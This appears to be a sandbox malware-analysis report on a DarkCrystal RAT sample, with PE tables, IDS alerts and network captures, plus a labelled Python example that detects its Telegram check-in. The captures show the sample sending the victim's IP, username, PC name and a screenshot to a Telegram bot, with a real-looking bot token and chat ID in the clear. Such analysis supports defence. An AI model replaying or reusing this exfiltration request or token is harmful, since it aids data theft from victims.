| IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x1ec000 | 0xc | .reloc |
| IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text |
| IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text |
| IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 | |
| Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics |
|---|---|---|---|---|---|---|---|---|---|
| .text | 0x2000 | 0x1e7494 | 0x1e7600 | 592d96b83e0140b309d1c091a6e55fb3 | False | 0.7868408766670941 | data | 7.564809337686255 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ |
| .rsrc | 0x1ea000 | 0x320 | 0x400 | 718a4114cbf5b42966612d186812a8a8 | False | 0.3544921875 | data | 2.6537284131589467 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| .reloc | 0x1ec000 | 0xc | 0x200 | c1198f7de73751649b75124b410033e8 | False | 0.044921875 | data | 0.09800417566270775 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ |
| Name | RVA | Size | Type | Language | Country | ZLIB Complexity |
|---|---|---|---|---|---|---|
| RT_VERSION | 0x1ea058 | 0x2c8 | data | | | 0.46207865168539325 |
| DLL | Import |
|---|---|
| mscoree.dll | _CorExeMain |
| Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol |
|---|---|---|---|---|---|---|---|---|
| 2024-11-18T09:17:12.477401+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.6 | 49733 | 34.117.59.81 | 443 | TCP |
| 2024-11-18T09:17:41.336700+0100 | 2048095 | ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) | 1 | 192.168.2.6 | 49878 | 37.44.238.250 | 80 | TCP |
| 2024-11-18T09:18:14.875621+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.6 | 49991 | 34.117.59.81 | 443 | TCP |
                                                                                                                Nov 18, 2024 09:18:13.315960884 CET49990443192.168.2.634.117.59.81
                                                                                                                Nov 18, 2024 09:18:13.315973997 CET4434999034.117.59.81192.168.2.6
                                                                                                                Nov 18, 2024 09:18:13.316040039 CET49990443192.168.2.634.117.59.81
                                                                                                                Nov 18, 2024 09:18:13.317977905 CET49990443192.168.2.634.117.59.81
                                                                                                                Nov 18, 2024 09:18:13.317990065 CET4434999034.117.59.81192.168.2.6
                                                                                                                Nov 18, 2024 09:18:13.930875063 CET4434999034.117.59.81192.168.2.6
                                                                                                                Nov 18, 2024 09:18:13.930978060 CET49990443192.168.2.634.117.59.81
                                                                                                                Nov 18, 2024 09:18:13.935745955 CET49990443192.168.2.634.117.59.81
                                                                                                                Nov 18, 2024 09:18:13.935762882 CET4434999034.117.59.81192.168.2.6
                                                                                                                Nov 18, 2024 09:18:13.936559916 CET4434999034.117.59.81192.168.2.6
                                                                                                                Nov 18, 2024 09:18:13.953598976 CET49990443192.168.2.634.117.59.81
                                                                                                                Nov 18, 2024 09:18:13.995342016 CET4434999034.117.59.81192.168.2.6
                                                                                                                Nov 18, 2024 09:18:14.098015070 CET4434999034.117.59.81192.168.2.6
                                                                                                                Nov 18, 2024 09:18:14.100512028 CET4434999034.117.59.81192.168.2.6
                                                                                                                Nov 18, 2024 09:18:14.100868940 CET49990443192.168.2.634.117.59.81
                                                                                                                Nov 18, 2024 09:18:14.101258039 CET49990443192.168.2.634.117.59.81
                                                                                                                Nov 18, 2024 09:18:14.101602077 CET49991443192.168.2.634.117.59.81
                                                                                                                Nov 18, 2024 09:18:14.101649046 CET4434999134.117.59.81192.168.2.6
                                                                                                                Nov 18, 2024 09:18:14.103379011 CET49991443192.168.2.634.117.59.81
                                                                                                                Nov 18, 2024 09:18:14.103564024 CET49991443192.168.2.634.117.59.81
                                                                                                                Nov 18, 2024 09:18:14.103580952 CET4434999134.117.59.81192.168.2.6
                                                                                                                Nov 18, 2024 09:18:14.722778082 CET4434999134.117.59.81192.168.2.6
                                                                                                                Nov 18, 2024 09:18:14.729568958 CET49991443192.168.2.634.117.59.81
                                                                                                                Nov 18, 2024 09:18:14.729592085 CET4434999134.117.59.81192.168.2.6
                                                                                                                Nov 18, 2024 09:18:14.875695944 CET4434999134.117.59.81192.168.2.6
                                                                                                                Nov 18, 2024 09:18:14.876646996 CET4434999134.117.59.81192.168.2.6
                                                                                                                Nov 18, 2024 09:18:14.876705885 CET49991443192.168.2.634.117.59.81
                                                                                                                Nov 18, 2024 09:18:14.888961077 CET49991443192.168.2.634.117.59.81
                                                                                                                Nov 18, 2024 09:18:15.152111053 CET49993443192.168.2.6149.154.167.220
                                                                                                                Nov 18, 2024 09:18:15.152170897 CET44349993149.154.167.220192.168.2.6
                                                                                                                Nov 18, 2024 09:18:15.152304888 CET49993443192.168.2.6149.154.167.220
                                                                                                                Nov 18, 2024 09:18:15.161549091 CET49993443192.168.2.6149.154.167.220
                                                                                                                Nov 18, 2024 09:18:15.161572933 CET44349993149.154.167.220192.168.2.6
                                                                                                                Nov 18, 2024 09:18:15.994221926 CET44349993149.154.167.220192.168.2.6
                                                                                                                Nov 18, 2024 09:18:15.994457960 CET49993443192.168.2.6149.154.167.220
                                                                                                                Nov 18, 2024 09:18:15.996164083 CET49993443192.168.2.6149.154.167.220
                                                                                                                Nov 18, 2024 09:18:15.996182919 CET44349993149.154.167.220192.168.2.6
                                                                                                                Nov 18, 2024 09:18:15.996586084 CET44349993149.154.167.220192.168.2.6
                                                                                                                Nov 18, 2024 09:18:15.997618914 CET49993443192.168.2.6149.154.167.220
                                                                                                                Nov 18, 2024 09:18:16.039326906 CET44349993149.154.167.220192.168.2.6
                                                                                                                Nov 18, 2024 09:18:16.231589079 CET44349993149.154.167.220192.168.2.6
                                                                                                                Nov 18, 2024 09:18:16.233563900 CET49993443192.168.2.6149.154.167.220
                                                                                                                Nov 18, 2024 09:18:16.233592987 CET44349993149.154.167.220192.168.2.6
                                                                                                                Nov 18, 2024 09:18:16.233886957 CET49993443192.168.2.6149.154.167.220
                                                                                                                Nov 18, 2024 09:18:16.233903885 CET44349993149.154.167.220192.168.2.6
                                                                                                                Nov 18, 2024 09:18:16.233983994 CET49993443192.168.2.6149.154.167.220
                                                                                                                Nov 18, 2024 09:18:16.233989000 CET44349993149.154.167.220192.168.2.6
                                                                                                                Nov 18, 2024 09:18:16.234199047 CET49993443192.168.2.6149.154.167.220
                                                                                                                Nov 18, 2024 09:18:16.234205008 CET44349993149.154.167.220192.168.2.6
                                                                                                                Nov 18, 2024 09:18:16.234226942 CET49993443192.168.2.6149.154.167.220
                                                                                                                Nov 18, 2024 09:18:16.234235048 CET44349993149.154.167.220192.168.2.6
                                                                                                                Nov 18, 2024 09:18:16.234304905 CET49993443192.168.2.6149.154.167.220
                                                                                                                Nov 18, 2024 09:18:16.234313965 CET44349993149.154.167.220192.168.2.6
                                                                                                                Nov 18, 2024 09:18:16.234350920 CET49993443192.168.2.6149.154.167.220
                                                                                                                Nov 18, 2024 09:18:16.234360933 CET44349993149.154.167.220192.168.2.6
                                                                                                                Nov 18, 2024 09:18:16.234385967 CET49993443192.168.2.6149.154.167.220
                                                                                                                Nov 18, 2024 09:18:16.234395027 CET44349993149.154.167.220192.168.2.6
                                                                                                                Nov 18, 2024 09:18:16.234424114 CET49993443192.168.2.6149.154.167.220
                                                                                                                Nov 18, 2024 09:18:16.234436989 CET44349993149.154.167.220192.168.2.6
                                                                                                                Nov 18, 2024 09:18:16.234493971 CET49993443192.168.2.6149.154.167.220
                                                                                                                Nov 18, 2024 09:18:16.234502077 CET44349993149.154.167.220192.168.2.6
                                                                                                                Nov 18, 2024 09:18:16.234538078 CET49993443192.168.2.6149.154.167.220
                                                                                                                Nov 18, 2024 09:18:16.234544992 CET44349993149.154.167.220192.168.2.6
                                                                                                                Nov 18, 2024 09:18:16.234575987 CET49993443192.168.2.6149.154.167.220
                                                                                                                Nov 18, 2024 09:18:16.234585047 CET44349993149.154.167.220192.168.2.6
                                                                                                                Nov 18, 2024 09:18:16.234621048 CET49993443192.168.2.6149.154.167.220
                                                                                                                Nov 18, 2024 09:18:16.234630108 CET44349993149.154.167.220192.168.2.6
                                                                                                                Nov 18, 2024 09:18:16.234646082 CET49993443192.168.2.6149.154.167.220
                                                                                                                Nov 18, 2024 09:18:16.234652996 CET44349993149.154.167.220192.168.2.6
                                                                                                                Nov 18, 2024 09:18:16.234767914 CET49993443192.168.2.6149.154.167.220
                                                                                                                Nov 18, 2024 09:18:16.234786987 CET44349993149.154.167.220192.168.2.6
                                                                                                                Nov 18, 2024 09:18:16.234810114 CET49993443192.168.2.6149.154.167.220
                                                                                                                Nov 18, 2024 09:18:16.234818935 CET44349993149.154.167.220192.168.2.6
                                                                                                                Nov 18, 2024 09:18:16.234831095 CET49993443192.168.2.6149.154.167.220
                                                                                                                Nov 18, 2024 09:18:16.234859943 CET44349993149.154.167.220192.168.2.6
                                                                                                                Nov 18, 2024 09:18:16.234873056 CET49993443192.168.2.6149.154.167.220
                                                                                                                Nov 18, 2024 09:18:16.234901905 CET44349993149.154.167.220192.168.2.6
                                                                                                                Nov 18, 2024 09:18:16.234927893 CET49993443192.168.2.6149.154.167.220
                                                                                                                Nov 18, 2024 09:18:16.234946966 CET44349993149.154.167.220192.168.2.6
                                                                                                                Nov 18, 2024 09:18:16.235152960 CET49993443192.168.2.6149.154.167.220
                                                                                                                Nov 18, 2024 09:18:16.235162973 CET44349993149.154.167.220192.168.2.6
                                                                                                                Nov 18, 2024 09:18:16.235191107 CET49993443192.168.2.6149.154.167.220
                                                                                                                Nov 18, 2024 09:18:16.235207081 CET44349993149.154.167.220192.168.2.6
                                                                                                                Nov 18, 2024 09:18:16.235236883 CET49993443192.168.2.6149.154.167.220
                                                                                                                Nov 18, 2024 09:18:16.235263109 CET44349993149.154.167.220192.168.2.6
                                                                                                                Nov 18, 2024 09:18:16.235271931 CET49993443192.168.2.6149.154.167.220
                                                                                                                Nov 18, 2024 09:18:16.235280037 CET44349993149.154.167.220192.168.2.6
                                                                                                                Nov 18, 2024 09:18:16.235333920 CET49993443192.168.2.6149.154.167.220
                                                                                                                Nov 18, 2024 09:18:16.235341072 CET44349993149.154.167.220192.168.2.6
                                                                                                                Nov 18, 2024 09:18:16.235419989 CET49993443192.168.2.6149.154.167.220
                                                                                                                Nov 18, 2024 09:18:16.235426903 CET44349993149.154.167.220192.168.2.6
                                                                                                                Nov 18, 2024 09:18:16.235466003 CET49993443192.168.2.6149.154.167.220
                                                                                                                Nov 18, 2024 09:18:16.235472918 CET44349993149.154.167.220192.168.2.6
                                                                                                                Nov 18, 2024 09:18:16.235497952 CET49993443192.168.2.6149.154.167.220
                                                                                                                Nov 18, 2024 09:18:16.235519886 CET44349993149.154.167.220192.168.2.6
                                                                                                                Nov 18, 2024 09:18:16.235538960 CET49993443192.168.2.6149.154.167.220
                                                                                                                Nov 18, 2024 09:18:16.235547066 CET44349993149.154.167.220192.168.2.6
                                                                                                                Nov 18, 2024 09:18:16.235562086 CET49993443192.168.2.6149.154.167.220
                                                                                                                Nov 18, 2024 09:18:16.235569000 CET44349993149.154.167.220192.168.2.6
                                                                                                                Nov 18, 2024 09:18:16.235627890 CET49993443192.168.2.6149.154.167.220
                                                                                                                Nov 18, 2024 09:18:16.235634089 CET44349993149.154.167.220192.168.2.6
                                                                                                                Nov 18, 2024 09:18:16.235696077 CET49993443192.168.2.6149.154.167.220
                                                                                                                Nov 18, 2024 09:18:16.235754013 CET44349993149.154.167.220192.168.2.6
                                                                                                                Nov 18, 2024 09:18:17.027103901 CET44349993149.154.167.220192.168.2.6
                                                                                                                Nov 18, 2024 09:18:17.027190924 CET49993443192.168.2.6149.154.167.220
                                                                                                                Nov 18, 2024 09:18:17.030755997 CET49993443192.168.2.6149.154.167.220
                                                                                                                Nov 18, 2024 09:18:17.030836105 CET44349993149.154.167.220192.168.2.6
                                                                                                                Nov 18, 2024 09:18:17.030910969 CET49993443192.168.2.6149.154.167.220
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Nov 18, 2024 09:17:10.536798000 CET | 49419 | 53 | 192.168.2.6 | 1.1.1.1
Nov 18, 2024 09:17:10.543829918 CET | 53 | 49419 | 1.1.1.1 | 192.168.2.6
Nov 18, 2024 09:17:12.632610083 CET | 55006 | 53 | 192.168.2.6 | 1.1.1.1
Nov 18, 2024 09:17:12.640109062 CET | 53 | 55006 | 1.1.1.1 | 192.168.2.6
Nov 18, 2024 09:18:13.281338930 CET | 58452 | 53 | 192.168.2.6 | 1.1.1.1
Nov 18, 2024 09:18:13.288364887 CET | 53 | 58452 | 1.1.1.1 | 192.168.2.6
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Nov 18, 2024 09:17:10.536798000 CET | 192.168.2.6 | 1.1.1.1 | 0xca9 | Standard query (0) | ipinfo.io | A (IP address) | IN (0x0001) | false
Nov 18, 2024 09:17:12.632610083 CET | 192.168.2.6 | 1.1.1.1 | 0xae76 | Standard query (0) | api.telegram.org | A (IP address) | IN (0x0001) | false
Nov 18, 2024 09:18:13.281338930 CET | 192.168.2.6 | 1.1.1.1 | 0x33dd | Standard query (0) | ipinfo.io | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Nov 18, 2024 09:17:10.543829918 CET | 1.1.1.1 | 192.168.2.6 | 0xca9 | No error (0) | ipinfo.io |  | 34.117.59.81 | A (IP address) | IN (0x0001) | false
Nov 18, 2024 09:17:12.640109062 CET | 1.1.1.1 | 192.168.2.6 | 0xae76 | No error (0) | api.telegram.org |  | 149.154.167.220 | A (IP address) | IN (0x0001) | false
Nov 18, 2024 09:18:13.288364887 CET | 1.1.1.1 | 192.168.2.6 | 0x33dd | No error (0) | ipinfo.io |  | 34.117.59.81 | A (IP address) | IN (0x0001) | false
• ipinfo.io
• api.telegram.org
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.6 | 49726 | 34.117.59.81 | 443 | 2016 | C:\Users\user\Desktop\LzmJLVB41K.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-18 08:17:11 UTC | 61 | OUT | GET /ip HTTP/1.1
    Host: ipinfo.io
    Connection: Keep-Alive
2024-11-18 08:17:11 UTC | 305 | IN | HTTP/1.1 200 OK
    date: Mon, 18 Nov 2024 08:17:10 GMT
    content-type: text/plain; charset=utf-8
    Content-Length: 14
    access-control-allow-origin: *
    via: 1.1 google
    strict-transport-security: max-age=2592000; includeSubDomains
    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
    Connection: close
2024-11-18 08:17:11 UTC | 14 | IN | Data Raw: 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 37
    Data Ascii: 155.94.241.187


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.6 | 49733 | 34.117.59.81 | 443 | 2016 | C:\Users\user\Desktop\LzmJLVB41K.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-18 08:17:12 UTC | 42 | OUT | GET /country HTTP/1.1
    Host: ipinfo.io
2024-11-18 08:17:12 UTC | 448 | IN | HTTP/1.1 200 OK
    access-control-allow-origin: *
    Content-Length: 3
    content-type: text/html; charset=utf-8
    date: Mon, 18 Nov 2024 08:17:12 GMT
    referrer-policy: strict-origin-when-cross-origin
    x-content-type-options: nosniff
    x-frame-options: SAMEORIGIN
    x-xss-protection: 1; mode=block
    via: 1.1 google
    strict-transport-security: max-age=2592000; includeSubDomains
    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
    Connection: close
2024-11-18 08:17:12 UTC | 3 | IN | Data Raw: 55 53 0a
    Data Ascii: US
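
The two ipinfo.io requests above (public IP, then country code) issued by PID 2016 and followed one second later by a POST to the Telegram Bot API from the same process are the check-in sequence this report records; the Bot API upload itself is captured in session 2 of this report. The Python below is an added example, not part of the Joe Sandbox report or the sample: it runs that detection logic over constructed proxy-style log lines. The log format (`<timestamp> <pid> <process path> <method> <host><path>`), the two bot tokens, and the geo-IP host and browser lists are assumptions, not data from the report. It parses the Bot API path to pull out the numeric bot ID and API method, redacts the secret part of the token so it can be reported without being reusable, and raises severity when a geo-IP lookup preceded the Telegram call from the same PID inside a time window.

```python
import re
from dataclasses import dataclass
from datetime import datetime

# Assumed hosts and process names (not from the report); extend for your environment.
GEOIP_HOSTS = {"ipinfo.io", "api.ipify.org", "ip-api.com"}
BROWSERS = {"firefox.exe", "chrome.exe", "msedge.exe"}

# Telegram Bot API path shape: /bot<numeric id>:<35-char secret>/<method>
BOT_CALL = re.compile(r"^/bot(\d{8,10}):([A-Za-z0-9_-]{35})/([A-Za-z]+)")
# Constructed log format: <iso-timestamp> <pid> <process path> <method> <host><path>
LINE = re.compile(r"^(\S+) (\d+) (.+?) (GET|POST) ([^/\s]+)(/\S*)$")

# Constructed sample log (not from the report). PID 2016 mirrors the sessions
# above; the other lines are benign or partial matches. Both tokens are fake.
SAMPLE_LOG = """\
2024-11-18T08:17:11Z 2016 C:\\Users\\user\\Desktop\\LzmJLVB41K.exe GET ipinfo.io/ip
2024-11-18T08:17:12Z 2016 C:\\Users\\user\\Desktop\\LzmJLVB41K.exe GET ipinfo.io/country
2024-11-18T08:17:13Z 2016 C:\\Users\\user\\Desktop\\LzmJLVB41K.exe POST api.telegram.org/bot1234567890:AAFexampleTOKENnotREALxxxxxxxxxxxxx/sendPhoto
2024-11-18T08:20:00Z 4312 C:\\Program Files\\Mozilla Firefox\\firefox.exe GET ipinfo.io/json
2024-11-18T08:25:40Z 7788 C:\\Tools\\notify.exe POST api.telegram.org/bot9876543210:AAGanotherCONSTRUCTEDtokenyyyyyyyyy/sendMessage
"""


@dataclass
class Event:
    ts: datetime
    pid: int
    process: str
    method: str
    host: str
    path: str


@dataclass
class Finding:
    pid: int
    process: str
    bot_id: str
    token_hint: str   # redacted: enough to report the bot, not enough to reuse it
    api_method: str
    geo_lookups: int  # geo-IP requests by the same PID inside the window
    severity: str


def parse_line(line: str) -> Event:
    m = LINE.match(line.strip())
    if not m:
        raise ValueError(f"unparseable log line: {line!r}")
    ts, pid, proc, method, host, path = m.groups()
    return Event(datetime.fromisoformat(ts.replace("Z", "+00:00")),
                 int(pid), proc, method, host, path)


def bot_call(path: str):
    """Return (bot_id, token, api_method) for a Bot API path, else None."""
    m = BOT_CALL.match(path)
    return m.groups() if m else None


def redact(token: str) -> str:
    """Keep a prefix and suffix of the secret so the bot can be identified in a report."""
    return f"{token[:4]}...{token[-3:]}"


def find_checkins(log: str, window_s: int = 300) -> list[Finding]:
    events = [parse_line(l) for l in log.splitlines() if l.strip()]
    findings = []
    for ev in events:
        call = bot_call(ev.path)
        if ev.host != "api.telegram.org" or call is None:
            continue
        bot_id, token, api_method = call
        exe = ev.process.rsplit("\\", 1)[-1].lower()
        # Geo-IP lookups by the same process shortly before the Bot API call.
        prior_geo = [p for p in events
                     if p.pid == ev.pid and p.host in GEOIP_HOSTS
                     and 0 <= (ev.ts - p.ts).total_seconds() <= window_s]
        if exe in BROWSERS and not prior_geo:
            continue  # assumption: a lone browser hit on the Bot API is noise
        findings.append(Finding(ev.pid, ev.process, bot_id, redact(token),
                                api_method, len(prior_geo),
                                "high" if prior_geo else "medium"))
    return findings


if __name__ == "__main__":
    for f in find_checkins(SAMPLE_LOG):
        print(f"[{f.severity}] pid={f.pid} {f.process} -> bot {f.bot_id} "
              f"({f.token_hint}) {f.api_method}, geo lookups before: {f.geo_lookups}")
```

On the sample input the desktop executable is reported as high severity (two geo-IP lookups, then `sendPhoto`), the stand-alone `notify.exe` call as medium, and the browser's ipinfo.io request alone produces nothing. The bot ID is kept in the clear because Telegram needs it to act on an abuse report, while the secret half of the token is what an attacker needs to reuse the bot, so only that part is redacted.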


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.6 | 49739 | 149.154.167.220 | 443 | 2016 | C:\Users\user\Desktop\LzmJLVB41K.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-18 08:17:13 UTC | 256 | OUT | POST /bot7520842495:AAGp6iR-yxPgcux3oLWODyICGAWeVDY-0VQ/sendPhoto HTTP/1.1
    Content-Type: multipart/form-data; boundary="5911ef4b-6830-488b-9b69-d419e32ff926"
    Host: api.telegram.org
    Content-Length: 100534
    Expect: 100-continue
    Connection: Keep-Alive
2024-11-18 08:17:13 UTC | 25 | IN | HTTP/1.1 100 Continue
2024-11-18 08:17:13 UTC | 40 | OUT | Data Raw: 2d 2d 35 39 31 31 65 66 34 62 2d 36 38 33 30 2d 34 38 38 62 2d 39 62 36 39 2d 64 34 31 39 65 33 32 66 66 39 32 36 0d 0a
    Data Ascii: --5911ef4b-6830-488b-9b69-d419e32ff926
2024-11-18 08:17:13 UTC | 89 | OUT | Data Raw: 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 63 68 61 74 5f 69 64 0d 0a 0d 0a
    Data Ascii: Content-Type: text/plain; charset=utf-8Content-Disposition: form-data; name=chat_id
2024-11-18 08:17:13 UTC | 10 | OUT | Data Raw: 31 32 37 36 30 38 33 30 32 33
    Data Ascii: 1276083023
2024-11-18 08:17:13 UTC | 131 | OUT | Data Raw: 0d 0a 2d 2d 35 39 31 31 65 66 34 62 2d 36 38 33 30 2d 34 38 38 62 2d 39 62 36 39 2d 64 34 31 39 65 33 32 66 66 39 32 36 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 63 61 70 74 69 6f 6e 0d 0a 0d 0a
    Data Ascii: --5911ef4b-6830-488b-9b69-d419e32ff926Content-Type: text/plain; charset=utf-8Content-Disposition: form-data; name=caption
2024-11-18 08:17:13 UTC | 136 | OUT | Data Raw: 6e 65 77 20 75 73 65 72 20 63 6f 6e 6e 65 63 74 20 21 0a 49 44 3a 20 66 65 33 63 34 62 38 33 30 35 35 30 35 36 31 34 38 61 36 37 39 34 62 39 61 37 34 63 63 66 36 61 31 36 31 39 30 32 30 38 0a 43 6f 6d 6d 65 6e 74 3a 20 0a 55 73 65 72 6e 61 6d 65 3a 20 65 6e 67 69 6e 65 65 72 0a 50 43 20 4e 61 6d 65 3a 20 36 30 39 32 39 30 0a 49 50 3a 20 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 37 0a 47 45 4f 3a 20 55 53 0a
    Data Ascii: new user connect !ID: fe3c4b83055056148a6794b9a74ccf6a16190208Comment: Username: userPC Name: 609290IP: 155.94.241.187GEO: US
2024-11-18 08:17:13 UTC | 146 | OUT | Data Raw: 0d 0a 2d 2d 35 39 31 31 65 66 34 62 2d 36 38 33 30 2d 34 38 38 62 2d 39 62 36 39 2d 64 34 31 39 65 33 32 66 66 39 32 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 70 68 6f 74 6f 3b 20 66 69 6c 65 6e 61 6d 65 3d 73 63 72 65 65 6e 73 68 6f 74 2e 70 6e 67 3b 20 66 69 6c 65 6e 61 6d 65 2a 3d 75 74 66 2d 38 27 27 73 63 72 65 65 6e 73 68 6f 74 2e 70 6e 67 0d 0a 0d 0a
    Data Ascii: --5911ef4b-6830-488b-9b69-d419e32ff926Content-Disposition: form-data; name=photo; filename=screenshot.png; filename*=utf-8''screenshot.png
2024-11-18 08:17:13 UTC | 4096 | OUT | Data Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d 38 32 3c 2e 33 34 32 ff db 00 43 01 09 09 09 0c 0b 0c 18 0d 0d 18 32 21 1c 21 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 ff c0 00 11 08 04 00 05 00 03 01 22 00 02 11 01 03 11 01 ff c4 00 1f 00 00 01 05 01 01 01 01 01 01 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 0a 0b ff c4 00 b5 10 00 02 01 03 03 02 04 03 05 05 04 04 00 00 01 7d 01 02 03 00 04 11 05 12 21 31 41 06 13 51 61 07 22 71 14 32 81 91 a1 08
    Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1AQa"q2
2024-11-18 08:17:13 UTC | 4096 | OUT | Data Raw: e2 e1 f0 db ef 20 f1 1f fc 93 2d 17 fd cb 6f fd 14 6b cf 6b d3 7c 73 6a 96 1e 0c b2 b3 88 b1 8e 09 62 89 4b 1e 48 54 60 33 ef c5 79 9d 56 52 d4 a9 4d af e6 7f 92 39 73 b4 e3 5a 09 ff 00 2a fc d8 94 50 68 af 50 f1 c2 92 96 92 80 3d 12 7b 3b 8b af 86 5a 6d c5 aa ef 9e c6 45 bb 54 fe f6 c6 6c fe 84 9f c2 b6 35 3b 1b 3f 1d f8 7a da e2 ce ec c5 22 b0 96 29 07 26 37 c7 2a c3 fc f6 35 73 c1 df f2 28 e9 df ee 37 fe 84 6a 9d d7 83 51 6f 64 bd d1 75 1b 8d 26 79 4e 64 58 46 e8 d8 fa 94 38 ff 00 0a f9 25 59 29 59 be 56 9b 69 fe 8c fb 9f 62 dc 13 4b 99 34 93 5f aa 23 d0 7c 2d 71 a5 ea 93 6b 5a c6 a9 f6 cb bf 2b 60 73 c2 a2 f7 24 9f 61 fc e9 9e 1d 94 eb 7e 2f d4 f5 e8 81 fb 12 44 2c ad dc 8f f5 98 20 b1 1e d9 1f ad 2b 78 3a f6 fc 84 d6 bc 45 77 7b 6c 0e 4c 11 c6 21 56
    Data Ascii: -okk|sjbKHT`3yVRM9sZ*PhP={;ZmETl5;?z")&7*5s(7jQodu&yNdXF8%Y)YVibK4_#|-qkZ+`s$a~/D, +x:Ew{lL!V
2024-11-18 08:17:13 UTC | 4096 | OUT | Data Raw: be 45 29 e4 f0 96 9c df d3 1c 33 e9 c7 5e 45 d3 f0 d8 cf b3 be b0 8a de de 29 35 24 5c 0b 75 72 6d 9c ed dc 3f 79 f5 d9 d3 fd ae d5 7a 19 04 d1 ef 52 0a e4 80 40 c6 47 ad 2f 93 11 ff 00 96 49 ff 00 7c 8a 78 00 0c 00 00 f6 af 4a 95 39 c1 fb d2 ba 3c 9a f5 a9 d4 5e ec 2c ca 9a a2 33 e9 b7 08 a3 24 af 15 5b 5a ba 9b 53 d5 75 0b ad 2a de da d6 d8 6a 42 f9 66 85 64 0f 74 e8 4e c6 7d ec 71 8c 9e 00 51 f3 1e 2b 50 80 46 0d 20 45 51 80 00 1e c2 b3 c4 60 e1 5e a4 67 3e 9f f0 3f c8 d7 0d 8f a9 86 a7 28 43 a9 4c 6a 9a 64 1a e5 d8 b7 32 9d 2e da dc 5c 69 e0 c4 f9 fb 62 bb ca a0 83 d0 06 99 d7 77 fb 22 b3 f4 cb 4b 49 ac 74 c5 bf bd 8a d6 ee c2 dd ad d9 2e a3 91 92 54 2e ee 19 4a 2b 7c d9 72 08 20 76 20 f5 c6 df 96 9f dc 5f ca 86 8d 1b ef 22 9f a8 ae 3a 79 44 29 bb c6
    Data Ascii: E)3^E)5$\urm?yzR@G/I|xJ9<^,3$[ZSu*jBfdtN}qQ+PF EQ`^g>?(CLjd2.\ibw"KIt.T.J+|r v _":yD)
